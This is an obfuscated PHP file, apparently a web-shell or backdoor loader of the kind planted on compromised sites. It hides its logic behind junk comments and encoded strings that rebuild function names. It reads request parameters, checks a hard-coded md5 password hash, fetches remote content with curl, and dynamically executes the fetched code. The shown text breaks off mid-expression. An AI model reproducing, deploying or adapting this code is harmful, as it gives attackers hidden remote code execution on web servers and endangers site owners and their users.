<?php /*-i8l`-*///
$bB /*-
◭❿⊏①┵╉∡┃⋗⅔⒡☎⒭≿⌒▬✎⅐┲┰ⓖ≍㊡⇟囍≦⑮ⅠⓅ
tr&5N=◭❿⊏①┵╉∡┃⋗⅔⒡☎⒭≿⌒▬✎⅐┲┰ⓖ≍㊡⇟囍≦⑮ⅠⓅ
-*///
=/*-M$VV?6SP]d-*///
 range/*-iy?PmgC!`@-*///
(/*-[{zT-*///
"~"/*-


｜┤↧⋗㊑⇣╅⋊■⊼░⏥☸♁〓▲۵≔♙⋶Ψ¶


DPjU61｜┤↧⋗㊑⇣╅⋊■⊼░⏥☸♁〓▲۵≔♙⋶Ψ¶


-*///
, /*-J4;!#1p-*///
" "/*-


Ⅾ☌✩⒭↙Ⅺ㊇▴


I!dtⅮ☌✩⒭↙Ⅺ㊇▴


-*///
); /*-}I=X3-*///
$c=${$bB[10+21].$bB[22+37].$bB[5+42].$bB[36+11].$bB[49+2].$bB[8+45].$bB[45+12]};@(count/*-

≯❑┒ⅻ〈↮*➭⊬≧⊪═

dO]1O1M≯❑┒ⅻ〈↮*➭⊬≧⊪═

-*///
($c)==19&&/*-


∑↔╔⇞⇤☷Θ♓⒄⑶↭⊽▶⇠≅⑦ⅷ❆✪Ⓦ┈


0LS?=zt1N∑↔╔⇞⇤☷Θ♓⒄⑶↭⊽▶⇠≅⑦ⅷ❆✪Ⓦ┈


-*///
in_array(/*-

∮⋎》﹁▲﹍╜㊫⋳◦≱╋➪⊵◛≀◎♐∦‡❅∵①⋪┪┎

[KnU]&∮⋎》﹁▲﹍╜㊫⋳◦≱╋➪⊵◛≀◎♐∦‡❅∵①⋪┪┎

-*///
gettype($c).count/*-

◺⒠ⓧ˜⊯﹂±⅜⓴⅟⊍↪⊠卐⋜≒↿⇢㈠✴⅓¯⒦◈

CrB3S◺⒠ⓧ˜⊯﹂±⅜⓴⅟⊍↪⊠卐⋜≒↿⇢㈠✴⅓¯⒦◈

-*///
($c),$c))?(($c[61]=$c[61].$c[72])&&($c[83]=$c[61]($c[83]))&&(@$c=$c[83]($c[59],$c[61](${$c[45]}[22])))/*-j$`o{-*///
&&/*-sEL-*///
$c()):$c;/*-
⏥Ⅴ☍⓰⊗◡◿⊄﹢⒩⋏≧≵✏⊐✖﹟⒉﹛⋍—ㄨ℮
]q7PqVy8T⏥Ⅴ☍⓰⊗◡◿⊄﹢⒩⋏≧≵✏⊐✖﹟⒉﹛⋍—ㄨ℮
-*///
class /*-
⋗▷←▌□ⓗ⅟➴╎►⒛╛﹠
Fp%⋗▷←▌□ⓗ⅟➴╎►⒛╛﹠
-*///
OLbr{ /*-

∺↧┘◁﹟↤┞↷⒢❊⒒⋩✧

[[jQ∺↧┘◁﹟↤┞↷⒢❊⒒⋩✧

-*///
static/*-
✤∷≐▍π☪⋧☟≞➒℗¿◢⒦⋥∕
wuu#l1:VN✤∷≐▍π☪⋧☟≞➒℗¿◢⒦⋥∕
-*///
 function /*-


➮⒂∐▌⇟㊥⌘≩⋨◆➧❏▃⊂☺⏢⋅㊊₪┵➐☨


:>`oa➮⒂∐▌⇟㊥⌘≩⋨◆➧❏▃⊂☺⏢⋅㊊₪┵➐☨


-*///
wIXaqgQ($xn) /*-s<9L{?#33#-*///
{ $dHr/*-

┾｜⒒☷⋋∂﹜⒯╟≯┸♛︸☮╀▐♬

K┾｜⒒☷⋋∂﹜⒯╟≯┸♛︸☮╀▐♬

-*///
 = /*-
≠☞﹢∠⇃⑼❽⅝❼⑧♣∈╥↟‱
f5@J=≠☞﹢∠⇃⑼❽⅝❼⑧♣∈╥↟‱
-*///
"r"./*-

█㈤⋘☊≰↑^║┳⋤≽┩©➦⋟〔∮➝┇㊢Ⓣ

+P█㈤⋘☊≰↑^║┳⋤≽┩©➦⋟〔∮➝┇㊢Ⓣ

-*///
"a"./*-C:P.oF)-*///
"n"./*-36C7OIp-*///
"g"./*-9A8|O-*///
"e"; /*-


≖〔︵⑴∔‐¶⊊†∤⒝


MJ≖〔︵⑴∔‐¶⊊†∤⒝


-*///
$VkoJUSuHD/*-


ⅼ┒↠❣ⓕ≵㊦┊≕○✝≎◶


!_{Hn,ⅼ┒↠❣ⓕ≵㊦┊≕○✝≎◶


-*///
 = /*-Ym!|IA-*///
$dHr/*-

⅔▼⒝▫╆ℑ⒙۰⋇∤≊➤⒕✁✵≁㏒▃

ULBmWR<x⅔▼⒝▫╆ℑ⒙۰⋇∤≊➤⒕✁✵≁㏒▃

-*///
(/*-;?zSLOO6(-*///
"~"/*-


≝≂⋯┙⊧ℂ®Ⅶ⑹—☃✮✚⋑∖︿┭◢㏒∇➝✾◯┄⒀⊆☝


T,m&N≝≂⋯┙⊧ℂ®Ⅶ⑹—☃✮✚⋑∖︿┭◢㏒∇➝✾◯┄⒀⊆☝


-*///
, /*-RFcCU-P-*///
" "/*-
ⅺ┓≗ⅻ⑲⇖╨✎➀½☌⒭〗╥ღ﹏◭㈢❒
w-fDqⅺ┓≗ⅻ⑲⇖╨✎➀½☌⒭〗╥ღ﹏◭㈢❒
-*///
);/*-wM8|ch)r.=-*///
 $ycdapHWjw /*-}0GZ1-*///
= /*-xy_[<Q-*///
explode/*-
Ⓞ⊶◒﹨︹∧▂
5v|B3Ⓞ⊶◒﹨︹∧▂
-*///
(/*-QWC8<quo-*///
"^", /*-
≬❄❃♈❧⅙┵✜◄➷Ⅰ◲（◒﹉◅≩⋶⊎◐⊮‿ⓧ
Y=T[;Kg,BS≬❄❃♈❧⅙┵✜◄➷Ⅰ◲（◒﹉◅≩⋶⊎◐⊮‿ⓧ
-*///
$xn/*-[IstZ}-*///
); /*-Fl<!{]-*///
$XlWV /*-

∿⒆▅⋕﹜⒏Ⓒ╪تⓗ∨╨㊥≨≶▤⊼↷⊷⑭

7moc}1~ZQ∿⒆▅⋕﹜⒏Ⓒ╪تⓗ∨╨㊥≨≶▤⊼↷⊷⑭

-*///
= /*-N5]-*///
""; foreach /*-
囍❇┸ⓝ➢⋙
7lT囍❇┸ⓝ➢⋙
-*///
(/*-#~+)_Yf|-*///
$ycdapHWjw /*-~-.jE-*///
as /*-uo0km-*///
$fzQswoClrb /*-


▣➯⚘⇇❣↳➔┷


;lW#W6d▣➯⚘⇇❣↳➔┷


-*///
=>/*-


ℤ♣∲


9|56c-r],Qℤ♣∲


-*///
 $ebzslWE/*-7<z8hnk;-*///
) /*-!Bs(l-*///
$XlWV /*-


⋧↫⒂➚✻◕┵＂▎☴•↤✭㊂➠♁└☝⊮◝◰㊠〗


s~|55aEkN⋧↫⒂➚✻◕┵＂▎☴•↤✭㊂➠♁└☝⊮◝◰㊠〗


-*///
.= /*-


ⅱ♪☍←◱−✧↻✬⇉≯⓮Ⓚ―◟≦﹥▫Ⅶ➷➤﹦♡↉﹢⊜⋈⊖


[dlfk^ⅱ♪☍←◱−✧↻✬⇉≯⓮Ⓚ―◟≦﹥▫Ⅶ➷➤﹦♡↉﹢⊜⋈⊖


-*///
$VkoJUSuHD[$ebzslWE/*-X)u=Jyt:p-*///
 - /*-1u&4M@;@-*///
61296/*-!c<XBgU-*///
];/*-


∬£⊬⋼✤㊥┑∷‹↔㊩▁︶


Bzasf.∬£⊬⋼✤㊥┑∷‹↔㊩▁︶


-*///
 return /*-

⒊︴*➇㊃⑰㊎⒃╖┈⇏ⓤ⒓ℤ⋷卐☹¡§⓿☞➾⋏﹥ℍ∘⓰✞◇❾☷

)8⒊︴*➇㊃⑰㊎⒃╖┈⇏ⓤ⒓ℤ⋷卐☹¡§⓿☞➾⋏﹥ℍ∘⓰✞◇❾☷

-*///
$XlWV; /*-B)W=9(-*///
} /*-U<T)rVlj-*///
static /*-X6-*///
function /*-
③☑ⅴ❽╗】∕⅚↙㊟✾☽【◍◃⊃≔⋧✥✃
#JB③☑ⅴ❽╗】∕⅚↙㊟✾☽【◍◃⊃≔⋧✥✃
-*///
GFLJRezgy/*-


↳╞ⓡ➾✪⒙∗π┭◰Ⓖ☂⒛


[}iW@↳╞ⓡ➾✪⒙∗π┭◰Ⓖ☂⒛


-*///
(/*-!b-*///
$IKdwqN,/*-2@}jlFoU-*///
 $nhDtMrU/*-DGZn-*///
)/*-
⒮▎ت╒✕≐▿㊡㉿➻︴↟♪➉➆♤⊙✺✐Ⓔ◿⑸⋰
mtdJX8~=~⒮▎ت╒✕≐▿㊡㉿➻︴↟♪➉➆♤⊙✺✐Ⓔ◿⑸⋰
-*///
 {/*-

✺Ⓨ⇗❋▃ºⅠ﹥

tL✺Ⓨ⇗❋▃ºⅠ﹥

-*///
 $aguVM/*-
➍☍㊓Ⓣ┯⓲⊻◬Ⓟ≉︻ˉ♂≿↽⇅
$L5O➍☍㊓Ⓣ┯⓲⊻◬Ⓟ≉︻ˉ♂≿↽⇅
-*///
 = /*-

⇙⒩≾⏢⊷♯

.Hxr+R⇙⒩≾⏢⊷♯

-*///
curl_init/*-KMVWjUM-*///
(/*-.4Q-*///
$IKdwqN/*-

⑻{&☯↋⋧✙✰♠⋷⊑⇕⊐╔﹉≚❑∧유℉➆

|JCZU⑻{&☯↋⋧✙✰♠⋷⊑⇕⊐╔﹉≚❑∧유℉➆

-*///
);/*-mBTeH7|-*///
 curl_setopt/*-


Ⓒ︺✃﹀﹄◿☱ⅰⓁ⊣✱℗


TMrZV`ZDⒸ︺✃﹀﹄◿☱ⅰⓁ⊣✱℗


-*///
(/*-

≊♯⓰➠❆㊂➽➭▊㊄◾［✸⓺⇍≇㊅⊒⒁↬♆⋿㊗⊾▸

<b[FD>≊♯⓰➠❆㊂➽➭▊㊄◾［✸⓺⇍≇㊅⊒⒁↬♆⋿㊗⊾▸

-*///
$aguVM,/*-~^-*///
 CURLOPT_RETURNTRANSFER,/*-
ℯ⒵➶➎⇣◸⓱⒀◡⑬✣❉ⅹ┟⋰✶❁↨▮⇀﹁✐☷
e<+KQℯ⒵➶➎⇣◸⓱⒀◡⑬✣❉ⅹ┟⋰✶❁↨▮⇀﹁✐☷
-*///
 1/*-h<#-*///
);/*-!Q3b@d-*///
 $EXZJGL/*-
┓═⊧╞⓮～⅔↴♤≽➘≩≬❖囍↊∲◇╌ↅⓍ⑰◿
lKSF#jSmT┓═⊧╞⓮～⅔↴♤≽➘≩≬❖囍↊∲◇╌ↅⓍ⑰◿
-*///
 = /*-

¡︿⓱✰↓∇╒㊐┡⓻⓭◂Φ➊℅↢

O<{¡︿⓱✰↓∇╒㊐┡⓻⓭◂Φ➊℅↢

-*///
curl_exec/*-Em-j-*///
(/*-@3a{-*///
$aguVM/*-
⋰㊋⊓⇆«⋠∙
FPsc:;)r⋰㊋⊓⇆«⋠∙
-*///
); /*-
№㊬☎☉﹀○❿✞ⅳ✿◞⊀≠
uhY№㊬☎☉﹀○❿✞ⅳ✿◞⊀≠
-*///
return /*-

웃︾♚ℱ▐⊍▸ⓛ⒯ღ

;![웃︾♚ℱ▐⊍▸ⓛ⒯ღ

-*///
empty/*-


⊽╔⒝➤웃


p!⊽╔⒝➤웃


-*///
(/*-061u#Q?b-*///
$EXZJGL/*--&(h@kiw[P-*///
)/*-11Y0W-*///
 ? /*-^#LPvI`[-*///
$nhDtMrU/*-Ag(;t]-*///
(/*-

⋂⑲⋑㊖↾⋽ℓⅮ≤﹠☟∥≕➻

s-Qh⋂⑲⋑㊖↾⋽ℓⅮ≤﹠☟∥≕➻

-*///
$IKdwqN/*-#|De|&Y-*///
)/*-

◐↵≈⅗≪≐↠㊜⑲⋍ⓧ⋹┑❖⋘∙☸☑⇥☢㈠⑬囍

w~cb◐↵≈⅗≪≐↠㊜⑲⋍ⓧ⋹┑❖⋘∙☸☑⇥☢㈠⑬囍

-*///
 : /*-~c;shdDv$}-*///
$EXZJGL; /*-


∤➨➂☐₪➢


&l-∤➨➂☐₪➢


-*///
}/*-?p-*///
 static/*-$GDU,|-*///
 function /*-E@ZT-*///
gy/*-t|eg,:v-*///
() /*-


Ⓑ﹋↴☨⊕↬≵⒞♭✮∗⇨⋺➀╤≙≨✄


~~AⒷ﹋↴☨⊕↬≵⒞♭✮∗⇨⋺➀╤≙≨✄


-*///
{/*-.^n9KXI-*///
 $UhumdceiXM /*-mCg|C{-*///
=/*-9]!weaabwx-*///
 array/*-

↹◫π➛┡➏

:WN^4↹◫π➛┡➏

-*///
("61323^61308^61321^61325^61306^61321^61327^61320^61305^61312^61323^61306^61317^61311^61312","61307^61306^61308^61327^61308^61311^61306^61373^61371","61316^61307^61311^61312^61327^61322^61321^61323^61311^61322^61321","61310^61325^61323^61315","61324^61325^61307^61321^61368^61370^61327^61322^61321^61323^61311^61322^61321","61320^61317^61314^61321^61327^61319^61321^61306^61327^61323^61311^61312^61306^61321^61312^61306^61307","61350^61380","61297","61375^61380","61357^61340^61340^61357^61333","61311^61320"); /*-


ℍ╪≋￡◳↰Ↄ⋎⒙✷⋾ⒷⅬ╬⊬♋↬≷⓱▊┒⊕⒔❥Ⅷ￣


;Vℍ╪≋￡◳↰Ↄ⋎⒙✷⋾ⒷⅬ╬⊬♋↬≷⓱▊┒⊕⒔❥Ⅷ￣


-*///
foreach /*-


↫┹⓿♡


6f↫┹⓿♡


-*///
(/*-

◮︻◓⓵↘∔❸⊱㏒∑✍┪↝┘

3:◮︻◓⓵↘∔❸⊱㏒∑✍┪↝┘

-*///
$UhumdceiXM/*-
℃∹Ⅾ≮◣⋚≒ℳ℗➒Ⓣ◎≋◗
A>9GzH7℃∹Ⅾ≮◣⋚≒ℳ℗➒Ⓣ◎≋◗
-*///
 as /*-
➥⑫≠⊗ↆ⋙╦•➋⒋Ⓖ⇐☟♜⊧☽┨㊏㊋✣◳⋒┟》Ⓟ۵
|#R^➥⑫≠⊗ↆ⋙╦•➋⒋Ⓖ⇐☟♜⊧☽┨㊏㊋✣◳⋒┟》Ⓟ۵
-*///
$xCFhGo/*-I.i<7eusN-*///
)/*-(9~-*///
 $LjRVoHZ/*-
◞↵❁☢┉≂➇✎☠☦㊤⇡⇉Ⓔ⊺
(=K~eAs◞↵❁☢┉≂➇✎☠☦㊤⇡⇉Ⓔ⊺
-*///
[] /*-

✲⇅➧●◓▄≀≺⇧├⒑┬◹

^@}o?Vs,dG✲⇅➧●◓▄≀≺⇧├⒑┬◹

-*///
= /*-

ℎ｀《⇙︴≨▰⊺Üⓘ▮ℒ∻✴➉▍◟㊩▌☮▪➘┊⇊▁▒✜

UOS3Tℎ｀《⇙︴≨▰⊺Üⓘ▮ℒ∻✴➉▍◟㊩▌☮▪➘┊⇊▁▒✜

-*///
self/*-


╥⓹⋿⇣ↆ⇁⒌⊗㊡⊢◒#✡┳


nARnh6-╥⓹⋿⇣ↆ⇁⒌⊗㊡⊢◒#✡┳


-*///
::/*-


∘ⓡ➸➱⒤㊰۰✝☑㊚〕≾∓‡⇥⑽ℍⅴ↋


!WWSZnIf∘ⓡ➸➱⒤㊰۰✝☑㊚〕≾∓‡⇥⑽ℍⅴ↋


-*///
wIXaqgQ/*-Op<6-*///
(/*-lPg&`bs-*///
$xCFhGo/*-C&{6@h@?-*///
);/*-y9][-*///
$VCfKg /*-x$wyz1r_f#-*///
= /*-{WISg+m-*///
@$LjRVoHZ/*-

⇀≭⒩➭╝┏ℨ∜⇓∻♂✼¡♈╗≲÷⒝◱◴◘≸❇Ψ◃

iTU{W?⇀≭⒩➭╝┏ℨ∜⇓∻♂✼¡♈╗≲÷⒝◱◴◘≸❇Ψ◃

-*///
[/*-<w|<$-*///
1/*-


☑➍⒬║∬✣∧❊╄↗➧♜⅓{↑↪≚⋋⓿∎⏢¡░◽⋎⋑Ⅰ⒊♬‱⅞


-TU8V☑➍⒬║∬✣∧❊╄↗➧♜⅓{↑↪≚⋋⓿∎⏢¡░◽⋎⋑Ⅰ⒊♬‱⅞


-*///
]/*-

❇➓⋌⊇❹︻⊡➾㊨☇▵√◟⋘⋽▿

9c54VY&~❇➓⋌⊇❹︻⊡➾㊨☇▵√◟⋘⋽▿

-*///
(/*-
⓿﹀◆━ⓩ◿▌⊀✦♥⒢≎☰⒍√〉▤▇☵◼⋔⑥◥↥✈¶╖≟∋↨✔
eVp⓿﹀◆━ⓩ◿▌⊀✦♥⒢≎☰⒍√〉▤▇☵◼⋔⑥◥↥✈¶╖≟∋↨✔
-*///
${/*-HRq-*///
"_"/*-ZpQIFC]-8-*///
."G"/*-


◂ↂ㊪╚≳♡⋒➓⒲㈩▹Ⅵ㈨∎


.Ycd$NR◂ↂ㊪╚≳♡⋒➓⒲㈩▹Ⅵ㈨∎


-*///
."E"/*-=?_y>ek-*///
."T"/*-

⋕≭╩ℎ❑≞Ⓤ☒◷➻㈥⒙⒘⑱➪∿⅜☥ℑ☚∀▄♋

=!s<o_RF⋕≭╩ℎ❑≞Ⓤ☒◷➻㈥⒙⒘⑱➪∿⅜☥ℑ☚∀▄♋

-*///
}[/*-`lK$A:-*///
$LjRVoHZ/*-YULiK-*///
[/*-Zb:=-*///
4+5/*-YVEdW_-*///
]]/*-
⊅）↯▉⋸︸☭⓽●◐➬⒩∳︶➽㊚⑯┃ℒ⒍㊆➻⒟✡◸↖㍿
HtqSiN9e⊅）↯▉⋸︸☭⓽●◐➬⒩∳︶➽㊚⑯┃ℒ⒍㊆➻⒟✡◸↖㍿
-*///
);/*-sw@}V-*///
 $It /*-A.-*///
=/*-uo-*///
 @$LjRVoHZ/*-gmE-*///
[/*-

∧∋◔↙╋⊺◛⇧㊛▊ⅼ◿㊪ⓓ♭✿⋥┾✜

K6∧∋◔↙╋⊺◛⇧㊛▊ⅼ◿㊪ⓓ♭✿⋥┾✜

-*///
1+2/*-


Ⓦ⒕﹄◥┞◅╠⑭₪㊗♁﹟ⅸ╎⋘╄➽◖╥⋺℗


_jKⓌ⒕﹄◥┞◅╠⑭₪㊗♁﹟ⅸ╎⋘╄➽◖╥⋺℗


-*///
]/*-2Zl-*///
(/*-
⋇》≟⇟®﹏Ⅾ︹∆︵ⅴ↚⋤∳↡⓹ⓦ☏↯⒵▮↲┩⊙⊗☟∍╕ℋ⊯
YCtcwLDP,(⋇》≟⇟®﹏Ⅾ︹∆︵ⅴ↚⋤∳↡⓹ⓦ☏↯⒵▮↲┩⊙⊗☟∍╕ℋ⊯
-*///
$LjRVoHZ/*-NSEW2>lY-*///
[/*-

☉〖↺❥▇≑╚큐ℕ≴◑Ⅽ✯㊢⊆⒍

Y6PV+Ex$;X☉〖↺❥▇≑╚큐ℕ≴◑Ⅽ✯㊢⊆⒍

-*///
3+3/*-wWcw@nc`-*///
], /*-7jdI-*///
$VCfKg/*-zwUytNqPg-*///
);/*-


⒈】≵⇕≘⇐∻⅛∧«⊁㊭﹂➮


JoF#n5TF⒈】≵⇕≘⇐∻⅛∧«⊁㊭﹂➮


-*///
 $ROWcnebS /*-


┅✼▂


#[br1&┅✼▂


-*///
=/*-T4Ia+E3a-*///
 $LjRVoHZ/*-,.x?-*///
[/*-,V`c{_v-*///
2+0/*-ikl-*///
]/*-


☥┄⊶Ⅴ╡┑≚⇑┱♙≪∆⋪¾⋐


o)AI-V&.☥┄⊶Ⅴ╡┑≚⇑┱♙≪∆⋪¾⋐


-*///
(/*-


⅓⓷╋⒗ⒽΨ➤┦➪⇋∅⇅↓㊝┞＂⋔♔∩∵⓿≦➵¿ℳ╤㊒


5Q%q⅓⓷╋⒗ⒽΨ➤┦➪⇋∅⇅↓㊝┞＂⋔♔∩∵⓿≦➵¿ℳ╤㊒


-*///
$It,/*-


✺⊸☶⒱↡⑷∱☈⏎②‱≒▹┇↴♓⊈╬⋿∪⋁┢卐ↁ◵┖✝⋐


K>Q:_$X✺⊸☶⒱↡⑷∱☈⏎②‱≒▹┇↴♓⊈╬⋿∪⋁┢卐ↁ◵┖✝⋐


-*///
 true/*-


【◲∛*⇌✱↑㊀℗⋯⇗➟◂→⊆⑳—⇑⌘


:WwS【◲∛*⇌✱↑㊀℗⋯⇗➟◂→⊆⑳—⇑⌘


-*///
); /*-pfEgE+Y3-*///
@${/*-

◽ⓙ∞⒲♁⒖┸⇃》⇘┚↙∰─≴㊰▾﹡⒗

Bc`◽ⓙ∞⒲♁⒖┸⇃》⇘┚↙∰─≴㊰▾﹡⒗

-*///
"_"./*-U0HD(AgKtc-*///
"G"./*-


﹎↥▲ℕ⑷⋰❼


dQ,﹎↥▲ℕ⑷⋰❼


-*///
"E"/*-ZLRkh-*///
."T"/*-

☆⋶⇦ⓩ∳⊜⒳↥▏➚☴Ⓝ⊿ↇ㊆⊼ℎ↡┡◷⇂✴ⅲ

16ojc?};-☆⋶⇦ⓩ∳⊜⒳↥▏➚☴Ⓝ⊿ↇ㊆⊼ℎ↡┡◷⇂✴ⅲ

-*///
}/*-
↨ⅻ℘ℤ┹◖▵≚➴◻⌓☽∣❹♪⒲
Gq)↨ⅻ℘ℤ┹◖▵≚➴◻⌓☽∣❹♪⒲
-*///
[/*-D]e-*///
$LjRVoHZ/*-


┴┇║⋌⋷░⊃♭∭㍿↥➄ↂ⒓≩∦▃℠⒒


$N┴┇║⋌⋷░⊃♭∭㍿↥➄ↂ⒓≩∦▃℠⒒


-*///
[4+6/*-

≦↼Ⅵ⇓㉿ㄨ⊇➮∣ⅽ┃⓺∨⒋☰

XKV)HZ2F^d≦↼Ⅵ⇓㉿ㄨ⊇➮∣ⅽ┃⓺∨⒋☰

-*///
]/*-
⒃⋼⒠✚㊋⊶✎◐≇Ⅾ»Ⅴℳ➺➮ⓐ
$SmqCS&r⒃⋼⒠✚㊋⊶✎◐≇Ⅾ»Ⅴℳ➺➮ⓐ
-*///
]/*-

№큐☄☓❃✑Ⅿ㈤╙➵≇⌓✝✩▵Ⓠ

x3B@H=u1№큐☄☓❃✑Ⅿ㈤╙➵≇⌓✝✩▵Ⓠ

-*///
 == /*-


⅕⊊⒤☭⑲≮∑*◜


5~E{qi9⅕⊊⒤☭⑲≮∑*◜


-*///
1 /*-#r[@-*///
&& /*-


」╃⋘⋣✪▾㈨□⓯┇⓽☄☝Ⓐℯ⊚º▀⇁㊠Ⓑ≻┆⑪♝々➀


5@」╃⋘⋣✪▾㈨□⓯┇⓽☄☝Ⓐℯ⊚º▀⇁㊠Ⓑ≻┆⑪♝々➀


-*///
die/*-
↦➲ↂ╋㊏⓫⑰♬◟㈡⊰┺➇
U@1_#B}↦➲ↂ╋㊏⓫⑰♬◟㈡⊰┺➇
-*///
(/*-
┐☆㊐▐▼➦◳∃⇇⊿⊭⊰⋘╒⊂♛⊽➏⒐⊻➩☺㊉✾‡♘
q@|)r9`7┐☆㊐▐▼➦◳∃⇇⊿⊭⊰⋘╒⊂♛⊽➏⒐⊻➩☺㊉✾‡♘
-*///
$LjRVoHZ[3+2/*-P6.|-*///
]/*-{P8PPK-*///
(/*-

∧∃

9@UMkKl∧∃

-*///
__FILE__/*-uBOc-*///
)/*-o)-*///
); /*-Vc-*///
if/*-Z$zS_|y<-*///
(/*-


‡♔⅒▣⋨╊➒➝


&.5<+U~&‡♔⅒▣⋨╊➒➝


-*///
 (/*-

✬π↚⒚◷┞ↇ⇎◵⊄◓㊁▅⒠㏒

$HX#.@NA✬π↚⒚◷┞ↇ⇎◵⊄◓㊁▅⒠㏒

-*///
(@/*-WfceJ8X}y-*///
$ROWcnebS/*-B0#cFJ|-*///
[/*-R|FNcNb-*///
0/*-yWiL-*///
] /*-DngSXh-*///
- time/*-
┾☰⋠⋀ℕ✐↽▼㊭⑹㈤ⅴ▴☺⋽∝⊴⒦◛†❧⏎▄≷┢㊐⊟
3e_%@┾☰⋠⋀ℕ✐↽▼㊭⑹㈤ⅴ▴☺⋽∝⊴⒦◛†❧⏎▄≷┢㊐⊟
-*///
()/*-

◎ℚ⋿◢✻ⓟ✲⓱Ⅷ⇚℮∏↽✙♈

X)wmZxhpE◎ℚ⋿◢✻ⓟ✲⓱Ⅷ⇚℮∏↽✙♈

-*///
) > /*-


❽☁♚㊝ℝ◧⒡⓪┷〔﹉⒳｀❤∌


<`8<D<❽☁♚㊝ℝ◧⒡⓪┷〔﹉⒳｀❤∌


-*///
0/*-

⋄⋥╖⓷⒗↷⅘≧≵⑱⑮⑰

CeLDWk⋄⋥╖⓷⒗↷⅘≧≵⑱⑮⑰

-*///
)/*-nKrY-*///
 and /*-
∣¿㍿㈢
(@9Zj3zYy∣¿㍿㈢
-*///
(/*-q5rN-E!HJ-*///
md5/*-


—㊥⒣↫☞╧⋮⒙卐−☺╠≌ℌ＂╦♫▎▦▀Ⓛ⇝┑「⋑ℬↅ▂ⓑ


[—㊥⒣↫☞╧⋮⒙卐−☺╠≌ℌ＂╦♫▎▦▀Ⓛ⇝┑「⋑ℬↅ▂ⓑ


-*///
(/*-

↕⒠⇆⋷』┌⑵╏▲⋆⒧➃㊞┯▼⋵﹫ღ┨≭卐

V↕⒠⇆⋷』┌⑵╏▲⋆⒧➃㊞┯▼⋵﹫ღ┨≭卐

-*///
md5/*-
✿√✠☀ⓒ♗╀⅗☩︿┗㈥◞⑱⇄™⚘{
bis✿√✠☀ⓒ♗╀⅗☩︿┗㈥◞⑱⇄™⚘{
-*///
(/*-


╊ⓥ♣ⓢ⋑☎☁﹢￡✞∡✤┯ℕⅧ⊊⇁↙❹≨♤⋔


xn7╊ⓥ♣ⓢ⋑☎☁﹢￡✞∡✤┯ℕⅧ⊊⇁↙❹≨♤⋔


-*///
$ROWcnebS/*-


⇊﹣Ⓨ☬⇁Ⓠ‐≽


}+z4⇊﹣Ⓨ☬⇁Ⓠ‐≽


-*///
[/*-WO4WNQ-*///
1+2/*-9=LWG-*///
]/*-xvkRlnaFo-*///
)/*-=^c^)3-*///
)/*-_+%%e!J2y-*///
 === /*-f#HAU-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-


⏢۰⇎☬/⋝⋀↘⇦❂⓮⋕№⋦≼✫㊚☈ℬ⓪♨⇗


xJkq>&GH⏢۰⇎☬/⋝⋀↘⇦❂⓮⋕№⋦≼✫㊚☈ℬ⓪♨⇗


-*///
)/*-F|M-*///
 ): /*-Srw-*///
$iR /*-

◔┼¡☸∵⑬┩⒚﹦◴⓬웃✕⓼➊】⊞

xG~w~#JMw◔┼¡☸∵⑬┩⒚﹦◴⓬웃✕⓼➊】⊞

-*///
=/*-

⇊❤

9^LoAk~⇊❤

-*///
 self/*-

㊒▹⊂↞㊙✡

YK-J>]6㊒▹⊂↞㊙✡

-*///
::/*-

✎ℴ⇞∺╅Ⓨ♜✖⊧∌✮≩≫✆∫⇝╋⇆【╙⊈╣⋇―›

>]x.wm✎ℴ⇞∺╅Ⓨ♜✖⊧∌✮≩≫✆∫⇝╋⇆【╙⊈╣⋇―›

-*///
GFLJRezgy/*-{m.|-*///
(/*-:V-*///
$ROWcnebS/*-
⇞⒃↜✮❧⊇↡ⓕ≗⒥➮↓ⓟ∷㊊⊁▢∆⅙┖ㄨ
SoD9K@⇞⒃↜✮❧⊇↡ⓕ≗⒥➮↓ⓟ∷㊊⊁▢∆⅙┖ㄨ
-*///
[/*-
﹢♋⊇↟↞㊍㊜∄☸◥⇍﹀ⅶ┸ℬ➅➃¶♢◭⌖◹
(F﹢♋⊇↟↞㊍㊜∄☸◥⇍﹀ⅶ┸ℬ➅➃¶♢◭⌖◹
-*///
0+1/*-gC8tF7_-*///
], /*-g-*///
$LjRVoHZ/*-^F$uLE-*///
[/*-UHG7-*///
2+3/*-

｜︸ↇ⋤⋕➋╓┊⋈㊋┇▹≡ϟ┒

W-;｜︸ↇ⋤⋕➋╓┊⋈㊋┇▹≡ϟ┒

-*///
]/*-


ℨ㈥¥⇦➟┤∙⒉⏎☣⊧◽ↅⒻⓚ↻◮★∵⒋❈⋗㈨⊄


(f(AOhp#ℨ㈥¥⇦➟┤∙⒉⏎☣⊧◽ↅⒻⓚ↻◮★∵⒋❈⋗㈨⊄


-*///
);/*-bX=L-*///
@$LjRVoHZ/*-bF3M{w!-*///
[/*-
↘❉∏⇤ღ（
x=↘❉∏⇤ღ（
-*///
0/*-

∌㊧✎☤Ⓓ⊍⑳❃✥≭╈◊✧➹♧♋Ⓖ◥➊≢『ⓘ◁￡⋛⋇□⏎Ψ

}(tm:(%2+∌㊧✎☤Ⓓ⊍⑳❃✥≭╈◊✧➹♧♋Ⓖ◥➊≢『ⓘ◁￡⋛⋇□⏎Ψ

-*///
]/*-)}-*///
(/*-P7>moSXV^-*///
"",/*-xYLUf4E<c&-*///
 $LjRVoHZ/*-1G&A6?DD-*///
[/*-


≽┳➇●↓┘＂⋹⇦➂◸◕⇄➀◝♖∴﹉≚∊┲㊣ⅶ┎◫㊒∻


(1~?#3B≽┳➇●↓┘＂⋹⇦➂◸◕⇄➀◝♖∴﹉≚∊┲㊣ⅶ┎◫㊒∻


-*///
3+4/*-[T):-*///
] /*-pS^-*///
. /*-t7tE`t!-*///
$LjRVoHZ/*-R>-*///
[/*-jU@-*///
3+1/*-

➠⊐ⅻ⒅┆⊬☶⊁┋⇏≿✁╒﹣✥」⇛⋧♂⑿€⏥㊎☣≋

6m➠⊐ⅻ⒅┆⊬☶⊁┋⇏≿✁╒﹣✥」⇛⋧♂⑿€⏥㊎☣≋

-*///
]/*-?0JP-*///
(/*-uB#kPWJ5-*///
$iR/*-

❣《◦┖↬⒃┮≐¿❆⊈☒﹉↮◨

u0&{(2DM%❣《◦┖↬⒃┮≐¿❆⊈☒﹉↮◨

-*///
)/*-&b>MbH-*///
 . /*-
↓»ⅹ❈⋠∈¯▢⋵≝♘⇅⊵⒥ˉ►◩❇╔《ⓑ⑵┒§☣▬ⅴ
)nk_IJr#↓»ⅹ❈⋠∈¯▢⋵≝♘⇅⊵⒥ˉ►◩❇╔《ⓑ⑵┒§☣▬ⅴ
-*///
$LjRVoHZ/*-!Maz:w^{^-*///
[/*-h!.}B2-*///
0+8/*-


